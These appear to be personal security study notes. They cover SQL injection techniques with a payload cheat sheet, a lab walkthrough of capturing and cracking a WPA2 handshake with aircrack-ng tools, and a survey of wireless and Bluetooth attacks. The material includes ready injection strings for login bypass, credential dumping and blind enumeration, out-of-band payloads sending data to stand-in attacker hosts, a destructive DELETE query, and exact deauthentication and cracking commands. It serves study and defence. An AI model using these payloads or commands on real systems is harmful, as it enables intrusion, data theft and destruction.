The out-of-band exploitation technique is very useful when you are exploiting a blind SQL injection vulnerability. You can use database management system (DBMS) functions to execute an out-of-band connection to obtain the results of the blind SQL injection attack. An attacker could exploit a blind SQL injection vulnerability at store.example.org and then force the victim server to send the results of the query (compromised data) to another server (malicious.hacker.org). Say that the malicious SQL string is as follows: https://store.h4cker.org/buyme.php?id=8||UTL_HTTP.request('malicious.h4cker.org')||(SELECT user FROM DUAL)-- In this example, the attacker is using the value 8 combined with the result of Oracle’s function UTL_HTTP.request.

Stacked Queries

In a normal SQL query, you can use a semicolon to specify that the end of a statement has been reached and what follows is a new one. This technique allows you to execute multiple statements in the same call to the database. UNION queries used in SQL injection attacks are limited to SELECT statements. However, stacked queries can be used to execute any SQL statement or procedure. A typical attack using this technique could specify a malicious input statement such as the following: 1; DELETE FROM customers

The Time-Delay SQL Injection Technique

When trying to exploit a blind SQL injection, the Boolean technique is very helpful. Another trick is to also induce a delay in the response, which indicates that the result of the conditional query is true. The following is an example of using the time-delay technique against a MySQL server: https://store.h4cker.org/buyme.php?id=8 AND IF(version() like '8%', sleep(10), 'false'))-- In this example, the query checks whether the MySQL version is 8.x and then forces the server to delay the answer by 10 seconds. The attacker can increase the delay time and monitor the responses. The attacker could even set the sleep parameter to a high value since it is not necessary to wait that long and then just cancel the request after a few seconds.

Surveying a Stored Procedure SQL Injection

A stored procedure is one or more SQL statements or a reference to an SQL server. Stored procedures can accept input parameters and return multiple values in the form of output parameters to the calling program. They can also contain programming statements that execute operations in the database (including calling other procedures). If an SQL server does not sanitize user input, it is possible to enter malicious SQL statements that will be executed within the stored procedure. The following example illustrates the concept of a stored procedure:

  Create procedure user_login @username varchar(20), @passwd varchar(20) As Declare @sqlstring varchar(250)
Set @sqlstring = ' Select 1 from users Where username = ' + @username + ' and passwd = ' + @passwd exec(@sqlstring) Go

By entering omar or 1=1' somepassword in a vulnerable application where the input is not sanitized, an attacker could obtain the password as well as other sensitive information from the database.

SQL Injection Mitigations

Input validation is an important part of mitigating SQL injection attacks. The best mitigation for SQL injection vulnerabilities is to use immutable queries, such as the following:

Static queries
Parameterized queries
Stored procedures (if they do not generate dynamic SQL) Immutable queries do not contain data that could get interpreted. In some cases, they process the data as a single entity that is bound to a column without interpretation. The following are two examples of static queries:

select * from contacts;
select * from users where user = "omar";

The following are examples of parameterized queries:

String query = "SELECT * FROM users WHERE name = ?";
PreparedStatement statement =
connection.prepareStatement(query);
statement.setString(1, username);
ResultSet results = statement.executeQuery();

TIP OWASP has a great resource that explains the SQL mitigations in detail; see https://www.owasp.org/index.php/SQL_Injection_Prevention_Cheat_Sheet. The OWASP Enterprise Security API (ESAPI) is another great resource. It is an open-source web application security control library that allows organizations to create lower-risk applications. ESAPI provides guidance and controls that mitigate SQL injection, XSS, CSRF, and other web application security vulnerabilities that take advantage of input validation flaws. You can obtain more information about ESAPI from https://owasp.org/www-project-enterprise-security-api/.

Tools

[[SQLmap]]
- to automate an SQL injection attack. SQLmap comes installed by default in Kali Linux and Parrot OS.
- https://sqlmap.org

Payloads

Authentication Bypass

' OR 1=1 --
' OR '1'='1' --
admin' -- 
admin' # 
admin'/* 
' OR 1=1 LIMIT 1 --

Union Based SQLi

' UNION SELECT NULL, NULL --
' UNION SELECT 1, 'admin' --
' UNION SELECT user, password FROM users --

Payloads to Extract Info

# Database version:
' UNION SELECT 1, version() --
' UNION SELECT 1, @@version --  
# Current Database:
' UNION SELECT 1, database() -- 
# All tables in current DB:
' UNION SELECT 1, table_name FROM information_schema.tables WHERE table_schema=database()-- 
# All columns in a table:
' UNION SELECT 1, column_name FROM information_schema.columns WHERE table_name='users'--

Error Based SQLis

' AND 1=CONVERT(int, (SELECT @@version))-- 
' AND 1=CAST((SELECT table_name FROM information_schema.tables) AS int)--

Boolean based blind SQLi

' AND 1=1 -- ✅ (true)
' AND 1=2 -- ❌ (false)
' AND (SELECT COUNT(*) FROM users) > 0 -- 
# boolean based info extraction  // enumerate through the letters in LIKE operation. 
' AND 1=(select 1 from information_schema.SCHEMATA where SCHEMA_NAME LIKE 'a%');--'  
' and 1=(select 1 from information_schema.TABLES where TABLE_NAME like 'users%' AND TABLE_SCHEMA='sqli');--
' and 1=(select 1 from information_schema.COLUMNS where COLUMN_NAME like 'username%' AND TABLE_NAME='users');--
' and 1=(select 1 from users where username like 'admin%');-- // use = operation to confirm

Time Based

If it is a valid SQL statement, the response will be delayed.

' OR IF(1=1, SLEEP(5), 0)-- 
' OR SLEEP(5)-- 
' AND IF(substring(@@version,1,1)='5', SLEEP(5), 0)-- 
' or 1=SLEEP(3);--
' or ( select SLEEP(3) FROM information_schema.SCHEMATA WHERE SCHEMA_NAME LIKE 'a%' LIMIT 1);--
' or ( select SLEEP(3) FROM users WHERE username LIKE 'a%' LIMIT 1);--

Out-of-Band SQLi (OOB)

'; EXEC xp_dirtree '\\attacker.com\abc'--  -- (MSSQL)
'; SELECT LOAD_FILE('\\\\attacker.com\\file')--  -- (MySQL)

Insert Error based

Assume a blog website with a commenting feature title and comment fields, where if we enter 'title' and 'comment' and the SQL query ran is: insert into comments (date,title,comment) values ('1752669636','title','comment')

We can using Injection, place the word title in the title field and comment in the comment field with only entering text into the title form field : title','comment2');-- The SQL query run will be : insert into comments (date,title,comment) values ('1752669636','title','comment');--','unusedcomment')

In this way we can extract info into the comment field by running sub queries in the comment field.

Using the version() command, create a sub query to place the MySQL version into the comment: title',(version()));--
This time use the subquery to extract distinct database names from the information_schema.tables table. : title',(SELECT GROUP_CONCAT(DISTINCT TABLE_SCHEMA) FROM information_schema.tables));--
Now we know the database of interest we can get a list of all the tables by changing the returned row to TABLE_NAME and putting a where filter on TABLE_SCHEMA. title',(SELECT GROUP_CONCAT(DISTINCT TABLE_NAME) FROM information_schema.tables WHERE TABLE_SCHEMA = 'sqli_five'));--
We have our database name and users table of interest, query the information_schema.columns table to extract a list of all the columns on the users table. title',(SELECT GROUP_CONCAT(DISTINCT COLUMN_NAME) FROM information_schema.columns WHERE TABLE_NAME = 'users'));--
Having the database,table and column information let's extract all the user information. title',( SELECT GROUP_CONCAT(username,':',password) FROM users) );--

Insert Blind Based

Assume a page with fields name,email,message and runs a SQL query of insert into comments (date,name,email,message) values ('1752671732','name','mail','message') Using the injection point, get the process to pause for 5 seconds to prove we have SQL Injection ',( SELECT SLEEP(5) ),'');-- The query run will be insert into comments (date,name,email,message) values ('1752671732','',( SELECT SLEEP(5) ),'');--','','') And if the process is held 5 sec, it implies this is vulnerable to SQLi. Using the version() command, create a sub query to check whether the version starts with a particular number: ',( select sleep(5) where version() like '8%' ) ,'');-- Likewise we can enumerate for information from the database. ',( select SLEEP(1) FROM users WHERE username LIKE 'a%') ,'');--

Injection Prevention

SQL queries are often programmed with the assumption that users will only input relevant information. For example, a login form that expects users to input their email address assumes the input will be formatted a certain way, such as jdoe@domain.com. Unfortunately, this isn’t always the case.

A key to preventing SQL injection attacks is to escape user inputs—preventing someone from inserting any code that a program isn't expecting. There are several ways to escape user inputs:

Prepared statements: a coding technique that executes SQL statements before passing them on to a database
Input sanitization: programming that removes user input which could be interpreted as code.
Input validation: programming that ensures user input meets a system's expectations. Resource: OWASP's SQL injection detection techniques

https://bl0ss0mx5.netlify.app/research/sqli/cheatsheet/

[Vault: Vulns & Attacks] Wifi hacking

Mon, 08 Dec 2025 08:56:33 GMT

On our current SSH session, run the command iw dev. This will show any wireless devices and their configuration that we have available for us to use.

Terminal

glitch@wifi:~$ iw dev
phy#2
	Interface wlan2
		ifindex 5
		wdev 0x200000001
		addr 02:00:00:00:02:00
		type managed
		txpower 20.00 dBm

The device/interface wlan2 is available to us, and there are two important details to take away from this output that will be useful to us:

The addr is the MAC/BSSID of our device. BSSID stands for Basic Service Set Identifier, and it's a unique identifier for a wireless device or access point's physical address.
The type is shown as managed. This is the standard mode used by most Wi-Fi devices (like laptops, phones, etc.) to connect to Wi-Fi networks. In managed mode, the device acts as a client, connecting to an access point to join a network. There is another mode called monitor, which we will discuss shortly.

Now, we would like to scan for nearby Wi-Fi networks using our wlan2 device. We can use sudo iw dev wlan2 scan. The dev wlan2 specifies the wireless device you want to work with, and scan tells iw to scan the area for available Wi-Fi networks.

Terminal

glitch@wifi:~$ sudo iw dev wlan2 scan
BSS 02:00:00:00:00:00(on wlan2)
	last seen: 520.388s [boottime]
	TSF: 1730575383370084 usec (20029d, 19:23:03)
	freq: 2437
	beacon interval: 100 TUs
	capability: ESS Privacy ShortSlotTime (0x0411)
	signal: -30.00 dBm
	last seen: 0 ms ago
	Information elements from Probe Response frame:
	SSID: MalwareM_AP
	Supported rates: 1.0* 2.0* 5.5* 11.0* 6.0 9.0 12.0 18.0 
	DS Parameter set: channel 6
	ERP: Barker_Preamble_Mode
	Extended supported rates: 24.0 36.0 48.0 54.0 
	RSN:	 * Version: 1
		 * Group cipher: CCMP
		 * Pairwise ciphers: CCMP
		 * Authentication suites: PSK
		 * Capabilities: 1-PTKSA-RC 1-GTKSA-RC (0x0000)
	Supported operating classes:
		 * current operating class: 81
	Extended capabilities:
		 * Extended Channel Switching
		 * Operating Mode Notification

There is a lot of information to dissect here, but here are the most important details that indicate this device is an access point:

The BSSID and SSID of the device are 02:00:00:00:00:00 and MalwareM_AP respectively. Since the SSID is shown, this means the device is advertising a network name, which access points do to allow clients to discover and connect to the network.
The presence of RSN (Robust Security Network) indicates the network is using WPA2, as RSN is a part of the WPA2 standard. WPA2 networks typically use RSN to define the encryption and authentication settings.
The Group and Pairwise ciphers are CCMP. Counter Mode with Cipher Block Chaining Message Authentication Code Protocol (CCMP) is the encryption method used by WPA2.
The Authentication suites value inside RSN is PSK indicating that this is a WPA2-Personal network, where a shared password is used for authentication.
Another important detail is the DS Parameter set value, which shows channel 6. The channel, in terms of Wi-Fi, refers to a specific frequency range within the broader Wi-Fi spectrum that allows wireless devices to communicate with each other. There are various Wi-Fi channels, and they all help distribute network traffic across various frequency ranges, which reduces interference. The two most common Wi-Fi channels are 2.4 GHz and 5GHz. In the 2.4 GHz band, channels 1, 6, and 11 are commonly used because they don’t overlap, minimising interference. In the 5 GHz band, there are many more channels available, allowing more networks to coexist without interference.

Now will be a good time to discuss another type that we can use on some wireless devices: monitor mode. This is a special mode primarily used for network analysis and security auditing. In this mode, the Wi-Fi interface listens to all wireless traffic on a specific channel, regardless of whether it is directed to the device or not. It passively captures all network traffic within range for analysis without joining a network. We want to check if our wlan2 interface can use monitor mode. To achieve this, we will run the command sudo ip link set dev wlan2 down to turn our device off. Then we will switch modes with sudo iw dev wlan2 set type monitor to change wlan2 to monitor mode. Then turn our device back on with sudo ip link set dev wlan2 up.

Terminal

glitch@wifi:~$ sudo ip link set dev wlan2 down
glitch@wifi:~$ sudo iw dev wlan2 set type monitor
glitch@wifi:~$ sudo ip link set dev wlan2 up

We can confirm that our interface is in monitor mode with the command sudo iw dev wlan2 info.

Terminal

glitch@wifi:~$ sudo iw dev wlan2 info
Interface wlan2
	ifindex 5
	wdev 0x200000001
	addr 02:00:00:00:02:00
	type monitor
	wiphy 2
	channel 1 (2412 MHz), width: 20 MHz (no HT), center1: 2412 MHz
	txpower 20.00 dBm

Now, let us create one more SSH session. We want to have 2 separate terminals in order to see clearly how the attack works. You can align the SSH terminals however you like, but here is an example of how it should look like.

On the first terminal, we start by capturing Wi-Fi traffic in the area, specifically targeting the WPA handshake packets. We can do this with the command sudo airodump-ng wlan2. This command provides a list of nearby Wi-Fi networks (SSIDs) and shows important details like signal strength, channel, and encryption type. This information is already known to us from our previous commands.

Note: By default, airodump-ng will automatically switch the selected wireless interface into monitor mode if the interface supports it.

Terminal

glitch@wifi:~$ sudo airodump-ng wlan2
BSSID              PWR  Beacons    #Data, #/s  CH   MB   ENC CIPHER  AUTH ESSID

 02:00:00:00:00:00  -28        2        0    0   6   54   WPA2 CCMP   PSK  MalwareM_AP

The output reveals the information we already knew before, such as the BSSID, SSID, and the channel. However, in this particular output, we are also given the channel where our target SSID is listening (channel 6). Now, we will focus on the MalwareM_AP access point and capture the WPA handshake; this is crucial for the PSK (password) cracking process.

First, in the current terminal, let us cancel airodump-ng using CTRL+C and then execute the command sudo airodump-ng -c 6 --bssid 02:00:00:00:00:00 -w output-file wlan2. This command targets the specific network channel and MAC address (BSSID) of the access point for which you want to capture the traffic and saves the information to a few files that start with the name output-file. These files will be used to crack the PSK. The ultimate goal of this command is to capture the 4-way handshake. It will first check for any clients that may be connected to the access point. If a client is already connected, then we can perform a deauthentication attack; otherwise, for any new client that connects, we will capture the 4-way handshake. In this particular scenario, a client is already connected. The output will look the same at first until we receive the information about the connected client, which will be displayed at the bottom of our output. It is important to leave this command running until we are done with the attack.

Terminal

glitch@wifi:~$ sudo airodump-ng -c 6 --bssid 02:00:00:00:00:00 -w output-file wlan2
BSSID              PWR RXQ  Beacons    #Data, #/s  CH   MB   ENC CIPHER  AUTH ESSID

 02:00:00:00:00:00  -28 100      631        8    0   6   54   WPA2 CCMP   PSK  MalwareM_AP  

 BSSID              STATION            PWR   Rate    Lost    Frames  Notes  Probes

It should take between 1 to 5 minutes before receiving the client information. In our case, it will show like this:

Terminal

 BSSID              PWR RXQ  Beacons    #Data, #/s  CH   MB   ENC CIPHER  AUTH ESSID

 02:00:00:00:00:00  -28 100      631        8    0   6   54   WPA2 CCMP   PSK  MalwareM_AP  

 BSSID              STATION            PWR   Rate    Lost    Frames  Notes  Probes

 02:00:00:00:00:00  02:00:00:00:01:00  -29    1 - 5      0      140

Note that the STATION section shows the device's BSSID (MAC) of 02:00:00:00:01:00 that is connected to the access point. This is the connection that we will be attacking. Now we are ready for the next step.

On the second terminal, we will launch the deauthentication attack. Because the client is already connected, we want to force them to reconnect to the access point, forcing it to send the handshake packets. We can break this down into 3 simple steps:

Deauthentication packets: The tool aireplay-ng sends deauthentication packets to either a specific client (targeted attack) or to all clients connected to an access point (broadcast attack). These packets are essentially "disconnect" commands that force the client to drop its current Wi-Fi connection.
Forcing a reconnection: When the client is disconnected, it automatically tries to reconnect to the Wi-Fi network. During this reconnection, the client and access point perform the 4-way handshake as part of the reauthentication process.
Capturing the handshake: This is where airodump-ng comes into play because it will capture this handshake as it happens, providing the data needed to attempt the WPA/WPA2 cracking.

We can do this with sudo aireplay-ng -0 1 -a 02:00:00:00:00:00 -c 02:00:00:00:01:00 wlan2. The -0 flag indicates that we are using the deauthentication attack, and the 1 value is the number of deauths to send. The -a indicates the BSSID of the access point and -c indicates the BSSID of the client to deauthenticate.

Terminal

glitch@wifi:~$ sudo aireplay-ng -0 1 -a 02:00:00:00:00:00 -c 02:00:00:00:01:00 wlan2
19:29:37  Waiting for beacon frame (BSSID: 02:00:00:00:00:00) on channel 6
19:29:38  Sending 64 directed DeAuth (code 7). STMAC: [02:00:00:00:01:00] [ 0| 0 ACKs]

Now, if we look back on our first terminal, we will see the WPA handshake shown on the top-right of our output as WPA handshake: 02:00:00:00:00:00. All of this information is being saved into our output files.

Terminal

 CH  6 ][ Elapsed: 1 min ][ 2024-11-02 19:30 ][ WPA handshake: 02:00:00:00:00:00 

 BSSID              PWR RXQ  Beacons    #Data, #/s  CH   MB   ENC CIPHER  AUTH ESSID

 02:00:00:00:00:00  -28 100      631        8    0   6   54   WPA2 CCMP   PSK  MalwareM_AP  

 BSSID              STATION            PWR   Rate    Lost    Frames  Notes  Probes

 02:00:00:00:00:00  02:00:00:00:01:00  -29    1 - 5      0      140  EAPOL

In the second terminal, we can use the captured WPA handshake to attempt to crack the WPA/WP2 passphrase. We will be performing a dictionary attack in order to match the passphrase against each entry in a specified wordlist file. A shortened version of the infamous rockyou.txt wordlist has already been provided for us to use. This is located in the /home/glitch/ directory. If the passphrase is weak and appears in the wordlist, it will eventually be cracked. The command sudo aircrack-ng -a 2 -b 02:00:00:00:00:00 -w /home/glitch/rockyou.txt output*cap will do this for us where the -a 2 flag indicates the WPA/WPA2 attack mode. The -b indicates the BSSID of the access point, and the -w flag indicates the dictionary list to use for the attack. Finally, we select the output files that we will be using, which contain the 4-way handshake that we will be cracking.

Terminal

glitch@wifi:~$ sudo aircrack-ng -a 2 -b 02:00:00:00:00:00 -w /home/glitch/rockyou.txt output*cap
Reading packets, please wait...
Opening output-file-01.cap
Read 276 packets.
1 potential targets

                               Aircrack-ng 1.6 

      [00:00:01] 304/513 keys tested (217.04 k/s) 

      Time left: 0 seconds                                      59.26%

                 KEY FOUND! [ REDACTED ]


      Master Key     : B6 53 9A 71 8C C4 74 5F E3 26 49 82 37 74 65 09 
                       BE C5 62 CE 43 C4 68 A7 B4 8F 8C E6 98 EE 1C CB 

      Transient Key  : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
                       00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
                       00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
                       00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 

      EAPOL HMAC     : C8 8E D5 F4 B4 5A 1D C4 6C 41 35 07 68 81 79 CD

Note: If you get an Packets contained no EAPOL data; unable to process this AP error, this means that you ran aircrack-ng prior to the handshake being captured or that the handshake was not captured at all. If that's the case, then re-do all of the steps in order to capture the WPA handshake.

With the PSK, we can now join the MalwareM_AP access point. In a typical engagement, we would do this to inspect the new network, or in some cases, joining the access point is enough to show impact. First, press CTRL+C on the terminal that has airodump-ng running in order to stop the airodump-ng process. We do this because we will not be able to join the Wi-Fi network while airodump-ng is running due to the fact that we are actively using the interface in monitor mode. Then execute the following commands:

Terminal

glitch@wifi:~$ wpa_passphrase MalwareM_AP 'ENTER PSK HERE' > config
glitch@wifi:~$ sudo wpa_supplicant -B -c config -i wlan2

Note: If you get a rfkill: Cannot get wiphy information error, you can ignore it. You will also notice that wpa_supplicant has automatically switched our wlan2 interface to managed mode.

Giving it about 10 seconds and checking the wireless interfaces once again with iw dev shows that we have joined the MalwareM_AP SSID.

Terminal

glitch@wifi:~$ iw dev
phy#2
-- Removed for brevity --

        Interface wlan2
		ifindex 5
		wdev 0x200000001
		addr 02:00:00:00:02:00
		ssid MalwareM_AP
		type managed
		channel 6 (2437 MHz), width: 20 MHz (no HT), center1: 2437 MHz
		txpower 20.00 dBm

[Vault: Vulns & Attacks] Wireless Vulnerabilities and Attacks

Mon, 08 Dec 2025 08:56:33 GMT

The security of Wi-Fi networks is important because wireless signals often extend beyond the physical boundaries of a facility, making them accessible to outsiders. Since these networks are essentially part of the internal infrastructure, it's crucial to regularly test and verify their security measures. Equally important though not specific to Wi-Fi is strong network access control. This ensures that even if someone manages to connect to the wireless network, they won't be able to reach sensitive data or systems.

[[Wireless Protocols]]

Rogue Access Points

One of the most simplistic wireless attacks involves an attacker installing a rogue AP in a network to fool users to connect to that AP. Basically, the attacker can use that rogue AP to create a backdoor and obtain access to the network and its systems

Evil Twin Attacks

In an evil twin attack, the attacker creates a rogue access point and configures it exactly the same as the existing corporate network Typically, the attacker uses DNS spoofing to redirect the victim to a cloned captive portal or a website. When users are logged on to the evil twin, a hacker can easily inject a spoofed DNS record into the DNS cache, changing the DNS record for all users on the fake network. Any user who logs in to the evil twin will be redirected by the spoofed DNS record injected into the cache. An attacker who performs a DNS cache poisoning attack wants to get the DNS cache to accept a spoofed record. Some ways to defend against DNS spoofing are using packet filtering, cryptographic protocols, and spoofing detection features provided by modern wireless implementations.

TIP Captive portals are web portals that are typically used in wireless networks in public places such as airports and coffee shops. They are typically used to authenticate users or to simply display terms and conditions that apply to users when they are using the wireless network. The user can simply click Accept to agree to the terms and conditions. In some cases, the user is asked to view an advertisement, provide an email address, or perform some other required action. Attackers can impersonate captive portals to perform social engineering attacks or steal sensitive information from users.

Disassociation (or Deauthentication) Attacks

An attacker can cause legitimate wireless clients to deauthenticate from legitimate wireless APs or wireless routers to either perform a DoS condition or to make those clients connect to an evil twin. This type of attack is also known as a disassociation attack because the attacker disassociates (tries to disconnect) the user from the authenticating wireless AP and then carries out another attack to obtain the user’s valid credentials.

A service set identifier (SSID) is the name or identifier associated with an 802.11 wireless local area network (WLAN). SSID names are included in plaintext in many wireless packets and beacons. A wireless client needs to know the SSID in order to associate with a wireless AP. It is possible to configure wireless passive tools like Kismet or KisMAC to listen to and capture SSIDs and any other wireless network traffic. In addition, tools such as Airmon-ng (which is part of the [[Aircrack-ng]] suite) can perform this reconnaissance. The Aircrack-ng suite of tools can be downloaded from https://www.aircrack-ng.org

Many corporations and individuals configure their wireless APs to not advertise (broadcast) their SSIDs and to not respond to broadcast probe requests. However, if you sniff on a wireless network long enough, you will eventually catch a client trying to associate with the AP and can then get the SSID. In Example 5-15 you can see the basic service set identifier (BSSID) and the extended basic service set identifier (ESSID) for every available wireless network. Basically, the ESSID identifies the same network as the SSID. You can also see the ENC encryption protocol. The encryption protocols can be Wi-Fi Protected Access (WPA) version 1, WPA version 2 (WPA2), WPA version 3 (WPA3), Wired Equivalent Privacy (WEP), or open (OPN).

The 802.11w standard defines the Management Frame Protection (MFP) feature. MFP protects wireless devices against spoofed management frames from other wireless devices that might otherwise deauthenticate a valid user session. In other words, MFP helps defend against deauthentication attacks. MFP is negotiated between the wireless client (supplicant) and the wireless infrastructure device (AP, wireless router, and so on).

Preferred Network List Attacks

Operating systems and wireless supplicants (clients), in many cases, maintain a list of trusted or preferred wireless networks. This is also referred to as the preferred network list (PNL). A PNL includes the wireless network SSID, plaintext passwords, or WEP or WPA passwords. Clients use these preferred networks to automatically associate to wireless networks when they are not connected to an AP or a wireless router.

It is possible for attackers to listen to these client requests and impersonate the wireless networks in order to make the clients connect to the attackers’ wireless devices and eavesdrop on their conversation or manipulate their communication.

Wireless Signal Jamming and Interference

The purpose of jamming wireless signals or causing wireless network interference is to create a full or partial DoS condition in the wireless network. Such a condition, if successful, is very disruptive. Most modern wireless implementations provide built-in features that can help immediately detect such attacks. In order to jam a Wi-Fi signal or any other type of radio communication, an attacker basically generates random noise on the frequencies that wireless networks use. With the appropriate tools and wireless adapters that support packet injection, an attacker can cause legitimate clients to disconnect from wireless infrastructure devices.

War Driving

War driving is a method attackers use to find wireless access points wherever they might be. By just driving (or walking) around, an attacker can obtain a significant amount of information over a very short period of time. Another similar attack is war flying, which involves using a portable computer or other mobile device to search for wireless networks from an aircraft, such as a drone or another unmanned aerial vehicle (UAV).

TIP A popular site among war drivers is WiGLE (https://wigle.net). The site allows users to detect Wi-Fi networks and upload information about the networks by using a mobile app.

Initialization Vector (IV) Attacks and Unsecured Wireless Protocols

An attacker can cause some modification on the initialization vector (IV) of a wireless packet that is encrypted during transmission. The goal of the attacker is to obtain a lot of information about the plaintext of a single packet and generate another encryption key that can then be used to decrypt other packets using the same IV. WEP is susceptible to many different attacks, including IV attacks.

[[Wifi hacking]]

Attacks Against WEP

Because WEP is susceptible to many different attacks, it is considered an obsolete wireless protocol. WEP must be avoided, and many wireless network devices no longer support it. WEP keys exist in two sizes: 40-bit (5-byte) and 104-bit (13-byte) keys. In addition, WEP uses a 24-bit IV, which is prepended to the pre-shared key (PSK). When you configure a wireless infrastructure device with WEP, the IVs are sent in plaintext.

WEP has been defeated for decades. WEP uses RC4 in a manner that allows an attacker to crack the PSK with little effort. The problem is related to how WEP uses the IVs in each packet. When WEP uses RC4 to encrypt a packet, it prepends the IV to the secret key before including the key in RC4. Subsequently, an attacker has the first 3 bytes of an allegedly “secret” key used on every packet. In order to recover the PSK, an attacker just needs to collect enough data from the air. An attacker can accelerate this type of attack by just injecting ARP packets (because the length is predictable), which allows the attacker to recover the PSK much faster. After recovering the WEP key, the attacker can use it to access the wireless network.

An attacker can also use the Aircrack-ng set of tools to crack (recover) the WEP PSK.

[[Aircrack-ng#Cracking WEP PSK|Cracking WEP PSK]]

Attacks Against WPA

WPA and WPA version 2 (WPA2) are susceptible to different vulnerabilities. WPA version 3 (WPA3) addresses all the vulnerabilities to which WPA and WPA2 are susceptible, and many wireless professionals recommend WPA3 to organizations and individuals.

All versions of WPA support different authentication methods, including PSK. WPA is not susceptible to the IV attacks that affect WEP; however, it is possible to capture the WPA four-way handshake between a client and a wireless infrastructure device and then brute-force the WPA PSK. ![[attachments/Wireless-Vulnerabilities-and-Attacks-1751395877097.png]] ![[attachments/Wireless-Vulnerabilities-and-Attacks-1751395898932.png]]

Capturing the WPA Four-Way Handshake and Cracking the PSK

Step 1. An attacker monitors the Wi-Fi network and finds wireless clients connected to the corp-net SSID.
Step 2. The attacker sends DeAuth packets to deauthenticate the wireless client.
Step 3. The attacker captures the WPA four-way handshake and cracks the WPA PSK. (It is possible to use word lists and tools such as Aircrack-ng to perform this attack.)
[[Aircrack-ng#Cracking WPA PSK|Cracking WPA PSK using Aircrack-ng]]

KRACK Attacks

Mathy Vanhoef and Frank Piessens, from the University of Leuven, found and disclosed a series of vulnerabilities that affect WPA and WPA2. These vulnerabilities – also referred to as KRACK (which stands for key reinstallation attack) – and details about them, are published at https://www.krackattacks.com.

Exploitation of these vulnerabilities depends on the specific device configuration. Successful exploitation could allow unauthenticated attackers to reinstall a previously used encryption or integrity key (either through the client or the access point, depending on the specific vulnerability). When a previously used key has successfully been reinstalled (by exploiting the disclosed vulnerabilities), an attacker may proceed to capture traffic using the reinstalled key and attempt to decrypt such traffic. In addition, the attacker may attempt to forge or replay previously seen traffic. An attacker can perform these activities by manipulating retransmissions of handshake messages. NOTE For details about KRACK attacks, see https://blogs.cisco.com/security/wpa-vulns. Most wireless vendors have provided patches that address the KRACK vulnerabilities, and WPA3 also addresses these vulnerabilities.

WPA3 Vulnerabilities

No technology or protocol is perfect. Several vulnerabilities in WPA3 have been discovered in recent years. The WPA3 protocol introduced a new handshake called the “dragonfly handshake” that uses Extensible Authentication Protocol (EAP) for authentication. Several vulnerabilities can allow an attacker to perform different side-channel attacks, downgrade attacks, and DoS conditions. Several of these vulnerabilities were found by security researcher Mathy Vanhoef. (For details about these attacks, see https://wpa3.mathyvanhoef.com.)

FragAttacks (which stands for fragmentation and aggregation attacks) is another type of vulnerability that can allow an attacker to exploit WPA3. For details and a demo of FragAttacks, see https://www.fragattacks.com.

Wi-Fi Protected Setup (WPS) PIN Attacks

Wi-Fi Protected Setup (WPS) is a protocol that simplifies the deployment of wireless networks. It is implemented so that users can simply generate a WPA PSK with little interaction with a wireless device. Typically, a PIN printed on the outside of the wireless device or in the box that came with it is used to provision the wireless device. Most implementations do not care if you incorrectly attempt millions of PIN combinations in a row, which means these devices are susceptible to brute-force attacks.

A tool called Reaver makes WPS attacks very simple and easy to execute. You can download Reaver from https://github.com/t6x/reaver-wps-fork-t6x.

KARMA Attacks

KARMA (which stands for karma attacks radio machines automatically) is an on-path attack that involves creating a rogue AP and allowing an attacker to intercept wireless traffic. A radio machine could be a mobile device, a laptop, or any Wi-Fi-enabled device.

In a KARMA attack scenario, the attacker listens for the probe requests from wireless devices and intercepts them to generate the same SSID for which the device is sending probes. This can be used to attack the PNL.

Fragmentation Attacks

Wireless fragmentation attacks can be used to acquire 1500 bytes of pseudo-random generation algorithm (PRGA) elements. Wireless fragmentation attacks can be launched against WEP-configured devices. These attacks do not recover the WEP key itself but can use the PRGA to generate packets with tools such as Packetforge-ng (which is part of the Aircrack-ng suite of tools) to perform wireless injection attacks.

You can find a paper describing and demonstrating fragmentation attacks at http://download.aircrack-ng.org/wiki-files/doc/Fragmentation-Attack-in-Practice.pdf.

Credential Harvesting

Credential harvesting is an attack that involves obtaining or compromising user credentials. Credential harvesting attacks can be launched using common social engineering attacks such as phishing attacks, and they can be performed by impersonating a wireless AP or a captive portal to convince a user to enter his or her credentials.

Tools such as [[ettercap]] can spoof DNS replies and divert a user visiting a given website to an attacker’s local system. For example, an attacker might spoof a site like Twitter, and when the user visits the website (which looks like the official Twitter website), he or she is prompted to log in, and the attacker captures the user’s credentials. Another tool that enables this type of attack is the Social-Engineer Toolkit (SET).

Bluejacking and Bluesnarfing

Bluejacking is an attack that can be performed using Bluetooth with vulnerable devices in range. An attacker sends unsolicited messages to a victim over Bluetooth, including a contact card (vCard) that typically contains a message in the name field. This is done using the Object Exchange (OBEX) protocol. A vCard can contain name, address, telephone numbers, email addresses, and related web URLs. This type of attack has been mostly performed as a form of spam over Bluetooth connections.

NOTE You can find an excellent paper describing Bluejacking at http://acadpubl.eu/jsi/2017-116-8/articles/9/72.pdf.

Another Bluetooth-based attack is Bluesnarfing. Bluesnarfing attacks are performed to obtain unauthorized access to information from a Bluetooth-enabled device. An attacker can launch Bluesnarfing attacks to access calendars, contact lists, emails and text messages, pictures, or videos from the victim.

Bluesnarfing is considered riskier than Bluejacking because whereas Bluejacking attacks only transmit data to the victim device, Bluesnarfing attacks actually steal information from the victim device.

Bluesnarfing attacks can also be used to obtain the International Mobile Equipment Identity (IMEI) number for a device. Attackers can then divert incoming calls and messages to another device without the user’s knowledge.

Using the Bluesnarfer Tool to Obtain a Device Name

$> bluesnarfer -b DE:AD:BE:EF:12:23 -i
device name: omar_phone

Bluetooth Low Energy (BLE) Attacks

Numerous IoT devices use Bluetooth Low Energy (BLE) for communication. BLE communications can be susceptible to on-path attacks, and an attacker could modify the BLE messages between systems that would think that they are communicating with legitimate systems. DoS attacks can also be problematic for BLE implementations. Several research efforts have demonstrated different BLE attacks. For instance, Ohio State University researchers have discovered different fingerprinting attacks that can allow an attacker to reveal design flaws and misconfigurations of BLE devices. Details about this research can be found at https://dl.acm.org/doi/pdf/10.1145/3319535.3354240.

Radio-Frequency Identification (RFID) Attacks

Radio-frequency identification (RFID) is a technology that uses electromagnetic fields to identify and track tags that hold electronically stored information. There are active and passive RFID tags. Passive tags use energy from RFID readers (via radio waves), and active tags have local power sources and can operate from longer distances. Many organizations use RFID tags to track inventory or in badges used to enter buildings or rooms. RFID tags can even be implanted into animals or people to read specific information that can be stored in the tags.

